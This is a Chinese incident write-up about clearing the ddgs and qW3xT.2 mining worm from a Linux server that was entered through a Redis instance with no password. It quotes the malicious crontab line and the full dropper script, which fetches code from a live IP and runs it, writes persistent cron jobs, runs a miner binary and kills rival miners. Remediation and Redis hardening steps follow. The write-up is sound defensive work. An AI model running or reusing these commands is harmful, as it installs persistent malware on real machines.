被入侵后的现象:

发现有qW3xT.2与ddgs两个异常进程,消耗了较高的cpu,kill掉后 过一会就会重新出现。

kill 掉这两个异常进程后,过一段时间看到了如下进程:

首先在/etc/sysconfig/crotnab中的定时任务没有找到定时脚本,输入crontab -e 在其中找到了该定时任务

1
*/5 * * * * curl -fsSL http://149.56.106.215:8000/i.sh | sh
1
"font-size: 15px;">查询了下149.56.106.215在美国,i.sh 脚本内容如下: 

export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin
echo "" > /var/spool/cron/root
echo "*/15 * * * * curl -fsSL http://149.56.106.215:8000/i.sh | sh" >> /var/spool/cron/root
echo "*/15 * * * * wget -q -O- http://149.56.106.215:8000/i.sh | sh" >> /var/spool/cron/root
mkdir -p /var/spool/cron/crontabs
echo "" > /var/spool/cron/crontabs/root
echo "*/15 * * * * curl -fsSL http://149.56.106.215:8000/i.sh | sh" >> /var/spool/cron/crontabs/root
echo "*/15 * * * * wget -q -O- http://149.56.106.215:8000/i.sh | sh" >> /var/spool/cron/crontabs/root
ps auxf | grep -v grep | grep /tmp/ddgs.3013 || rm -rf /tmp/ddgs.3013
if [ ! -f "/tmp/ddgs.3013" ]; thenwget -q http://149.56.106.215:8000/static/3013/ddgs.$(uname -m) -O /tmp/ddgs.3013curl -fsSL http://149.56.106.215:8000/static/3013/ddgs.$(uname -m) -o /tmp/ddgs.3013
fi
chmod +x /tmp/ddgs.3013 && /tmp/ddgs.3013ps auxf | grep -v grep | grep Circle_MI | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep get.bi-chi.com | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep hashvault.pro | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep nanopool.org | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep minexmr.com | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep /boot/efi/ | awk '{print $2}' | xargs kill
#ps auxf | grep -v grep | grep ddg.2006 | awk '{print $2}' | kill
#ps auxf | grep -v grep | grep ddg.2010 | awk '{print $2}' | kill

处理方法:

1.删除  crontab -e 中

*/5 * * * * curl -fsSL http://149.56.106.215:8000/i.sh | sh

2.清除/root/.ssh/authorized_keys 中黑客设置的免密登录内容

3.修改redis密码

4.修改root与登录账户密码

安全建议:

1.配置bind选项,限定可以连接Redis服务器的IP,修改 Redis 的默认端口6379 配置认证,也就是AUTH,设置密码,密码会以明文方式保存在Redis配置文件中

2.配置rename-command 配置项 “RENAME_CONFIG”,这样即使存在未授权访问,也能够给攻击者使用config 指令加大难度

3.如果可以在防火墙中屏蔽redis外网

入侵方式:

收集了相关资料,了解到其是利用redis漏洞,未设置密码或密码太简单,导致的被入侵。具体方式可以参考

http://blog.knownsec.com/2015/11/analysis-of-redis-unauthorized-of-expolit/

reids修改密码方法如下:

redis-cli -h 127.0.0.1 -p 6379
config get requirepass ##获取当前密码
config set requirepass "yourpassword" ##设置当前密码,服务重新启动后又会置为默认,即无密码;

永久生效方法为,打开redis配置文件redis.conf,找到requirepass值修改密码,如下:

requirepass yourpassword  ##此处注意,行前不能有空格

linux 服务器被植入ddgs、qW3xT.2挖矿病毒处理记录相关推荐

  1. linux服务器被植入挖矿病毒后初步解决方案

    linux服务器被植入挖矿病毒是真让人无语,密码也被暴力破解,还时不时挖矿重启. 只能上网搜索,初步解决方案如下: 一.定位攻击服务器的ip 首先root,然后进~/.cache,使用netstat ...

  2. Linux被kdevtmpfsi,pnscan挖矿病毒入侵记录

    Linux被kdevtmpfsi,pnscan挖矿病毒入侵 记录起因 从腾讯云刚拿了一台新服务器,第一天装好docker环境后,第二天上午就收到了来自腾讯云的短信警告.登陆平台后发现站内信 好在腾讯没 ...

  3. 一键查杀linux挖矿脚本,这几个linux命令或许帮您查杀挖矿病毒

    最近受类似于比特币及区块链技术的影响,有些云服务器被攻入,植入挖矿病毒,利用你的云服务器来挖矿.本文就阐述几个常用的linux命令,假如你碰到这样的病毒,这些linux命令可能会有些帮助.这些命令并不 ...

  4. 服务器集体中毒事件 xmrig trace 挖矿病毒

    事件简述: 2019年12月22日,我们服务的一个客户服务器大面积提示被用于"挖矿",随即我们便进行了病毒的清理,但病毒的来源通过我们原有实施的监控和安全检测中并未能发现.事前我们 ...

  5. 阿里云 qW3xT.4 挖矿病毒问题

    查了一下.是个挖矿病毒,cpu 占用巨高 .杀了又有守护进程启动.网上有些杀死这个病毒的办法,大家可以试试.但是不确定能杀死. 建议直接重装系统. 然后,说说这货怎么传播的. 他公国redis .目前 ...

  6. syst3md 挖矿病毒处理记录

    这两天发现服务器上部署的应用系统 体验较差,访问响应慢  不太对劲.部分接口响应达到了 4秒.正好空闲上服务器上检查一下性能. [root@localhost ~]# mpstat -P ALL 10 ...

  7. 清除挖矿病毒solr记录

    问题场景: 周一早上查看grafana,少了三个节点的信息,启动后,发现三个节点的cpu告警,随后节点又挂了. 正常情况下,一般node节点不会挂掉,查看节点hadoop相关进程,一切正常. 问题描述 ...

  8. Centos qW3xT.2 挖矿病毒

    亲测,管用! https://blog.csdn.net/yitian_66/article/details/81304681

  9. 【应急类漏洞】WatchDogsMiner挖矿蠕虫大量感染Linux服务器

    近日,深信服安全团队追踪到公有云上及外部Linux服务器存在大量被入侵,表现为/tmp临时目录存在watchdogs文件,出现了crontab任务异常.网络异常.系统文件被删除.CPU异常卡顿等情况, ...

最新文章

  1. 基于消失点的相机自标定(2)
  2. PM们,请避免对产品的过度解读!
  3. ASP.NET MVC5+EF6+EasyUI 后台管理系统(73)-微信公众平台开发-消息管理
  4. 对事务的特性ACID的理解
  5. 机器学习算法之集成学习
  6. 信息学奥赛一本通(1173:阶乘和)
  7. 使用ssh远程连接时的一些注意问题
  8. 05-netty小例子
  9. 02-neo4j的基本命令
  10. 以太坊智能合约部署与交互
  11. TinyMCE 富文本编辑器 ━━ 自定义插件之弹窗基础设置(整理)
  12. android app 后台运行,安卓APP锁定后台运行的方法
  13. 东芝打印机共享怎么设置_如何设置东芝复印机为网络共享打印机?
  14. carry on till tomorrow
  15. 电容或电感的电压_磁场对于电感路径检测的影响
  16. 三款骨传导耳机性价比推荐-2023年最受欢迎的骨传导牌子
  17. python的类中 _、__和__xx__的区别
  18. MySQL Workbench报错说 seems to be a different OS
  19. trunc和round区别
  20. wp10手机不能连接微软服务器,Lumia920手机更新10166版WP10后,无法用Microsoft账户登录,也无法添加Microsoft账 - Microsoft Community...

热门文章

  1. 安卓Okhttp3源码的简单分析
  2. Telnet服务配置
  3. 最好的EM算法介绍-由例子介绍原理
  4. qt中添加背景图片(stylesheet)
  5. 利用Matlab描述和求解传递函数
  6. 机器学习的思考–计算机的潜意识
  7. 【CSS3】text-align属性
  8. avro 文件的使用
  9. 计算机单机取证(autopsy工具使用)
  10. QAT量化感知训练(一)【详解】